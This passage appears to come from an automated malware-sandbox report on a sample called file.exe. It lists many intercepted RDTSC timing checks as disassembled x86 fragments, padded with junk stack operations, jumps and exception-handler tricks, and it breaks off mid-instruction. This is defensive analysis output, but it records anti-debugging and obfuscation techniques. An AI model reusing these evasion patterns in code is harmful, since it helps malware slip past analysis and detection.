                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A9D9A second address: 4A9D9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A9D9E second address: 4A9DB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F3D90F37F1Ah 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AAA99 second address: 4AAA9F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AAA9F second address: 4AAACA instructions: 0x00000000 rdtsc 0x00000002 jo 00007F3D90F37F2Eh 0x00000008 jmp 00007F3D90F37F28h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 ja 00007F3D90F37F16h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AAACA second address: 4AAAEF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jo 00007F3D90D93B46h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F3D90D93B57h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AAC7C second address: 4AAC81 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0DD4 second address: 4A0DD9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0DD9 second address: 4A0DE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AAF1E second address: 4AAF24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AAF24 second address: 4AAF31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F3D90F37F16h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AFE52 second address: 4AFE60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jnc 00007F3D90D93B46h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B1355 second address: 4B1359 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B1359 second address: 4B135F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B135F second address: 4B137E instructions: 0x00000000 rdtsc 0x00000002 ja 00007F3D90F37F1Ch 0x00000008 jno 00007F3D90F37F16h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 pushad 0x00000012 pushad 0x00000013 js 00007F3D90F37F16h 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c push ecx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B827C second address: 4B82AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jp 00007F3D90D93B48h 0x0000000b jmp 00007F3D90D93B58h 0x00000010 popad 0x00000011 pushad 0x00000012 push edi 0x00000013 jg 00007F3D90D93B46h 0x00000019 pop edi 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B82AF second address: 4B82B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B7830 second address: 4B784E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 je 00007F3D90D93B46h 0x0000000c jnl 00007F3D90D93B46h 0x00000012 pop eax 0x00000013 popad 0x00000014 pushad 0x00000015 pushad 0x00000016 jbe 00007F3D90D93B46h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B79AD second address: 4B79B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B79B2 second address: 4B79BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F3D90D93B46h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B79BF second address: 4B79D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3D90F37F1Ah 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B79D5 second address: 4B79DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B79DB second address: 4B79DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B7E3B second address: 4B7E58 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F3D90D93B46h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jng 00007F3D90D93B4Ch 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B8138 second address: 4B813C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BAEF8 second address: 4BAF19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b jmp 00007F3D90D93B56h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 46F058 second address: 46F05D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BCE01 second address: 4BCE15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F3D90D93B4Eh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BD2CF second address: 4BD2D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BD2D3 second address: 4BD2D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BD3A3 second address: 4BD3A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BD511 second address: 4BD516 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BDFE0 second address: 4BDFE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BE0EB second address: 4BE108 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b ja 00007F3D90D93B52h 0x00000011 jmp 00007F3D90D93B4Ch 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BE5DD second address: 4BE5E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BEDC8 second address: 4BEDCE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BEDCE second address: 4BEDD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BFFBF second address: 4BFFC5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C08FB second address: 4C0948 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 mov esi, dword ptr [ebp+122D26B4h] 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 mov edi, dword ptr [ebp+122D394Dh] 0x00000016 pop esi 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push edi 0x0000001c call 00007F3D90F37F18h 0x00000021 pop edi 0x00000022 mov dword ptr [esp+04h], edi 0x00000026 add dword ptr [esp+04h], 0000001Ch 0x0000002e inc edi 0x0000002f push edi 0x00000030 ret 0x00000031 pop edi 0x00000032 ret 0x00000033 mov dword ptr [ebp+122D1BD3h], eax 0x00000039 push eax 0x0000003a push esi 0x0000003b push eax 0x0000003c push edx 0x0000003d jns 00007F3D90F37F16h 0x00000043 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C1112 second address: 4C1127 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F3D90D93B46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push eax 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f jnp 00007F3D90D93B46h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C1C32 second address: 4C1C3C instructions: 0x00000000 rdtsc 0x00000002 je 00007F3D90F37F16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C2791 second address: 4C2797 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C1C3C second address: 4C1C41 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C29EE second address: 4C29F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C2797 second address: 4C27BD instructions: 0x00000000 rdtsc 0x00000002 jne 00007F3D90F37F1Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F3D90F37F22h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C29F4 second address: 4C29F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C1C41 second address: 4C1C4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C27BD second address: 4C27C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C29F8 second address: 4C2A65 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 mov si, 82C8h 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push edx 0x00000012 call 00007F3D90F37F18h 0x00000017 pop edx 0x00000018 mov dword ptr [esp+04h], edx 0x0000001c add dword ptr [esp+04h], 0000001Ch 0x00000024 inc edx 0x00000025 push edx 0x00000026 ret 0x00000027 pop edx 0x00000028 ret 0x00000029 xor esi, 240AB37Ah 0x0000002f mov esi, 429F2E41h 0x00000034 push 00000000h 0x00000036 mov esi, 43852738h 0x0000003b xchg eax, ebx 0x0000003c jg 00007F3D90F37F30h 0x00000042 push eax 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 push ecx 0x00000048 pop ecx 0x00000049 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C2A65 second address: 4C2A7A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D90D93B51h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C575A second address: 4C575E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C6CE5 second address: 4C6CE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C6CE9 second address: 4C6CED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C6CED second address: 4C6D47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007F3D90D93B48h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 0000001Bh 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 mov bh, 84h 0x00000026 push 00000000h 0x00000028 mov di, si 0x0000002b push 00000000h 0x0000002d jo 00007F3D90D93B55h 0x00000033 jmp 00007F3D90D93B4Fh 0x00000038 push eax 0x00000039 push eax 0x0000003a push edx 0x0000003b jns 00007F3D90D93B4Ch 0x00000041 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C7DDE second address: 4C7DEC instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F3D90F37F16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C6F14 second address: 4C6F18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C7DEC second address: 4C7DF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C6F18 second address: 4C6F28 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D90D93B4Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C6F28 second address: 4C6F2D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C6F2D second address: 4C6F52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F3D90D93B46h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F3D90D93B55h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C6F52 second address: 4C6F5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F3D90F37F16h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C8C4B second address: 4C8C59 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C6F5C second address: 4C6F60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C8C59 second address: 4C8C5F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C7038 second address: 4C7044 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F3D90F37F1Ch 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C8C5F second address: 4C8CCC instructions: 0x00000000 rdtsc 0x00000002 je 00007F3D90D93B4Ch 0x00000008 ja 00007F3D90D93B46h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 nop 0x00000011 jmp 00007F3D90D93B56h 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push edi 0x0000001b call 00007F3D90D93B48h 0x00000020 pop edi 0x00000021 mov dword ptr [esp+04h], edi 0x00000025 add dword ptr [esp+04h], 00000018h 0x0000002d inc edi 0x0000002e push edi 0x0000002f ret 0x00000030 pop edi 0x00000031 ret 0x00000032 push 00000000h 0x00000034 pushad 0x00000035 mov ebx, 0840AD90h 0x0000003a mov edi, dword ptr [ebp+122D261Dh] 0x00000040 popad 0x00000041 xchg eax, esi 0x00000042 ja 00007F3D90D93B4Ah 0x00000048 push eax 0x00000049 jc 00007F3D90D93B4Eh 0x0000004f push edx 0x00000050 push eax 0x00000051 push edx 0x00000052 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C8E9A second address: 4C8F4D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 jmp 00007F3D90F37F23h 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push edx 0x00000011 call 00007F3D90F37F18h 0x00000016 pop edx 0x00000017 mov dword ptr [esp+04h], edx 0x0000001b add dword ptr [esp+04h], 00000015h 0x00000023 inc edx 0x00000024 push edx 0x00000025 ret 0x00000026 pop edx 0x00000027 ret 0x00000028 push dword ptr fs:[00000000h] 0x0000002f mov dword ptr [ebp+122D1F15h], ebx 0x00000035 mov dword ptr fs:[00000000h], esp 0x0000003c jmp 00007F3D90F37F28h 0x00000041 mov eax, dword ptr [ebp+122D0E31h] 0x00000047 clc 0x00000048 push FFFFFFFFh 0x0000004a push 00000000h 0x0000004c push ebp 0x0000004d call 00007F3D90F37F18h 0x00000052 pop ebp 0x00000053 mov dword ptr [esp+04h], ebp 0x00000057 add dword ptr [esp+04h], 0000001Ch 0x0000005f inc ebp 0x00000060 push ebp 0x00000061 ret 0x00000062 pop ebp 0x00000063 ret 0x00000064 mov edi, dword ptr [ebp+122D2CCCh] 0x0000006a nop 0x0000006b push eax 0x0000006c push edx 0x0000006d jmp 00007F3D90F37F28h 0x00000072 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C9E6F second address: 4C9E73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C9E73 second address: 4C9E8B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F3D90F37F1Eh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C9E8B second address: 4C9F11 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D90D93B52h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a add ebx, dword ptr [ebp+122D3939h] 0x00000010 push dword ptr fs:[00000000h] 0x00000017 mov ebx, esi 0x00000019 mov dword ptr fs:[00000000h], esp 0x00000020 push 00000000h 0x00000022 push edx 0x00000023 call 00007F3D90D93B48h 0x00000028 pop edx 0x00000029 mov dword ptr [esp+04h], edx 0x0000002d add dword ptr [esp+04h], 00000019h 0x00000035 inc edx 0x00000036 push edx 0x00000037 ret 0x00000038 pop edx 0x00000039 ret 0x0000003a or edi, dword ptr [ebp+122D2D1Fh] 0x00000040 mov eax, dword ptr [ebp+122D1171h] 0x00000046 mov dword ptr [ebp+122D18AAh], esi 0x0000004c push FFFFFFFFh 0x0000004e mov edi, dword ptr [ebp+122D3C09h] 0x00000054 nop 0x00000055 jmp 00007F3D90D93B53h 0x0000005a push eax 0x0000005b pushad 0x0000005c jg 00007F3D90D93B4Ch 0x00000062 push eax 0x00000063 push edx 0x00000064 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD379 second address: 4CD37D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD4EE second address: 4CD4FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CE6F3 second address: 4CE6F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D14D5 second address: 4D1520 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F3D90D93B58h 0x0000000a popad 0x0000000b nop 0x0000000c jmp 00007F3D90D93B4Ch 0x00000011 push 00000000h 0x00000013 xor edi, dword ptr [ebp+122D3C69h] 0x00000019 push 00000000h 0x0000001b mov bx, 89BAh 0x0000001f cmc 0x00000020 xchg eax, esi 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F3D90D93B4Eh 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D257C second address: 4D259D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3D90F37F1Fh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F3D90F37F1Bh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D259D second address: 4D25A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D0670 second address: 4D0676 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D1680 second address: 4D1702 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a jmp 00007F3D90D93B50h 0x0000000f push dword ptr fs:[00000000h] 0x00000016 push 00000000h 0x00000018 push ebx 0x00000019 call 00007F3D90D93B48h 0x0000001e pop ebx 0x0000001f mov dword ptr [esp+04h], ebx 0x00000023 add dword ptr [esp+04h], 0000001Dh 0x0000002b inc ebx 0x0000002c push ebx 0x0000002d ret 0x0000002e pop ebx 0x0000002f ret 0x00000030 jl 00007F3D90D93B52h 0x00000036 jl 00007F3D90D93B4Ch 0x0000003c or edi, dword ptr [ebp+122D2D8Ah] 0x00000042 mov dword ptr fs:[00000000h], esp 0x00000049 sub dword ptr [ebp+1247B27Ch], eax 0x0000004f mov eax, dword ptr [ebp+122D0931h] 0x00000055 push edi 0x00000056 pushad 0x00000057 xor ebx, 7EFE7911h 0x0000005d add dword ptr [ebp+122D2C4Ah], ecx 0x00000063 popad 0x00000064 pop edi 0x00000065 push FFFFFFFFh 0x00000067 push eax 0x00000068 push esi 0x00000069 push esi 0x0000006a push eax 0x0000006b push edx 0x0000006c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF6C9 second address: 4CF6CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D0715 second address: 4D071B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D3466 second address: 4D34F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 mov di, 5511h 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push edx 0x00000012 call 00007F3D90F37F18h 0x00000017 pop edx 0x00000018 mov dword ptr [esp+04h], edx 0x0000001c add dword ptr [esp+04h], 0000001Dh 0x00000024 inc edx 0x00000025 push edx 0x00000026 ret 0x00000027 pop edx 0x00000028 ret 0x00000029 mov ebx, 2FA471FEh 0x0000002e call 00007F3D90F37F1Dh 0x00000033 mov ebx, ecx 0x00000035 pop ebx 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push ecx 0x0000003b call 00007F3D90F37F18h 0x00000040 pop ecx 0x00000041 mov dword ptr [esp+04h], ecx 0x00000045 add dword ptr [esp+04h], 0000001Ch 0x0000004d inc ecx 0x0000004e push ecx 0x0000004f ret 0x00000050 pop ecx 0x00000051 ret 0x00000052 mov edi, dword ptr [ebp+122D2B94h] 0x00000058 xchg eax, esi 0x00000059 push edi 0x0000005a jmp 00007F3D90F37F1Dh 0x0000005f pop edi 0x00000060 push eax 0x00000061 pushad 0x00000062 ja 